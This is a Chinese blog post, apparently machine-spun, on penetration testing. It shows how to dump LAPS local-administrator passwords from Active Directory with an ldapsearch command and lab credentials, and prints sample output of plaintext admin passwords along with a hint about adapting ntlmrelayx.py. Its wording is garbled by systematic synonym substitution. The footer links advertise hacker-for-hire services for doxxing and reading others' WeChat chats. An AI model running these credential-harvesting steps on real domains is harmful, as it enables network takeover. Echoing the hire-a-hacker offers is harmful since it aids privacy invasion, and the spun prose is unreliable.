域浸透TIPS:获取LAPS管理员暗码

访客5年前黑客文章1080


假如你之前有对启用LAPS机制的主机进行浸透测验,那么你应该能体会到该机制的随机化本地管理员暗码是有多么令人苦楚。
LAPS将其信息存储在活动目录:
存储暗码过期时刻:ms-Mcs-AdmPwdExpirationTime: 131461867015760024
以明文显现的存储暗码:ms-Mcs-AdmPwd: %v!e#7S#{s})+y2yS#(
LAPS前期版别中,任何用户都能够读取活动目录中的内容。还好微软现已修正,现在你有必要取得该目标的一切扩展权限或者是彻底操控权限才能够进行拜访。

在杂乱的实在环境中,内网主机中还或许存在躲藏的OU权限管理员,乃至是具有彻底操控权限的,担任特定用户组的一个规范用户。
得益于Meatballs开发的Metasploit模块:https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/enum_laps.rb 协助咱们完成了这项作业。可是咱们不或许每次都特别翻开一个Meterpreter会话来运转该模块吧?
运用ldapsearch(包括在Debian/Ubuntu的ldapscripts程序包中)能够被用来结构与该模块相同的恳求,以下就是一个比如:
ldapsearch -x -h 192.168.80.10 -D
"helpdesk" -w ASDqwe123 -b "dc=sittingduck,dc=info"
"(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
解析:
-x – 运用根底身份验证
-h 192.168.80.10 – 将ldap衔接到域操控器
-D “helpdesk” -w ASDqwe123 – 以用户名helpdesk,暗码ASDqwe123进行登录
-b “dc=sittingduck,dc=info” – 加载整个域的根底LDAP目标
“(ms-MCS-AdmPwd=*)” – 过滤掉一切不能检查的ms-MCS-AdmPwd值 (只需具有满足的权限,乃至还能够获取Administrator暗码)
ms-MCS-AdmPwd – 仅显现ms-MCS-AdmPwd目标 (默许包括目标名以及DN,所以你仍是能知道主机从属关系)
运转状况如下:
$ ldapsearch -x -h 192.168.80.10 -D "helpdesk" -w ASDqwe123 -b "dc=sittingduck,dc=info" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
# extended LDIF
#
# LDAPv3
# base  with scope subtree
# filter: (ms-MCS-AdmPwd=*)
# requesting: ms-MCS-AdmPwd
#
# DC1, Domain Controllers, sittingduck.info
dn: CN=DC1,OU=Domain Controllers,DC=sittingduck,DC=info
ms-Mcs-AdmPwd: 2F1i/++N0H+G]{Y&,F
# SDCLIENT_DAWIN7, LabComputers, Lab, sittingduck.info
dn: CN=SDCLIENT_DAWIN7,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info
ms-Mcs-AdmPwd: 8CDR4,2UE8BA{zw2@RR
# SD_WSUS_2012, LabComputers, Lab, sittingduck.info
dn: CN=SD_WSUS_2012,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info
ms-Mcs-AdmPwd: +3!UY5@g9B.64RV2z/T
# WIN-PM0ID6F0AHN, LabComputers, Lab, sittingduck.info
dn: CN=WIN-PM0ID6F0AHN,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info
ms-Mcs-AdmPwd: %v!e#7S#{s})+y2yS#(
# search reference
ref: ldap://research.sittingduck.info/DC=research,DC=sittingduck,DC=info
# search reference
ref: ldap://ForestDnsZones.sittingduck.info/DC=ForestDnsZones,DC=sittingduck,D
 C=info
# search reference
ref: ldap://DomainDnsZones.sittingduck.info/DC=DomainDnsZones,DC=sittingduck,D
 C=info
# search reference
ref: ldap://sittingduck.info/CN=Configuration,DC=sittingduck,DC=info
# search result
search: 2
result: 0 Success
至从取得本地管理员暗码,但还没有确认该帐号是否启用,你能够运用Kerberos进行身份验证。因为Windows中域操控器对LDAP衔接不会要求证书验证(据我所知),你只需在ntlmrelayx.py进行一些小修正就能转储LAPS暗码了;-)
 

相关文章

使用HSTS嗅探浏览器历史纪录的三个缝隙

HSTS是让浏览器强制运用HTTPS拜访网站的一项安全战略。HSTS的规划初衷是缓解中间人进犯带来的危险。本文首要介绍HSTS及其他Web功用带来的一些隐私问题,比方怎么运用它们来勘探浏览器的用户历史...

Gozi银行木马再现,针对高新制造业、进出口企业的“鱼叉式攻击”-黑客接单平台

近来,深服气安全团队监测到针对进出口贸易企业、国内大型高新制造业的鱼叉式网络垂钓进犯活动再次开端活泼。进犯者经过假造政府部分邮件、企业内部邮件等方法向方针组织特定部分(如:收购部分、财务部分等)建议进...

俄罗斯黑客接单_淘宝找黑客人肉

2018年共有430余万台(只包含国内且不含WannaCry数据)计算机遭受勒索病毒进犯;GandCrab、GlobeImposter、CrySis这三大宗族勒索病毒的受害者最多,算计占比高达80.2...

黑客 淘宝 接单,找马云公司应聘的黑客,找黑客能查对方微信聊天记录吗

}文章点评:怎么防备黑客运用FSO跨目录侵略其他网站或许许多办理员都不大了解,其实,FSO合理的使用,仅仅windows服务器安全的其间一部分。...

Inception bar:一种新的钓鱼方法-黑客接单平台

欢迎来到国际第七大银行汇丰银行!是的,上面图片中的网站并不是hsbc.com,而是我自己开发的网站jameshfisher.com。可是,当你用Chrome移动版阅读器上下滑动阅读这个网站时,会发现除...

Apache日志实时剖析东西:ARTLAS

ARTLAS(Apache Real Time Logs Analyzer System)是一个Apache日志实时分析器。它根据OWASP排名前10的缝隙,可辨认对web应用程序发起的进犯,并能够经...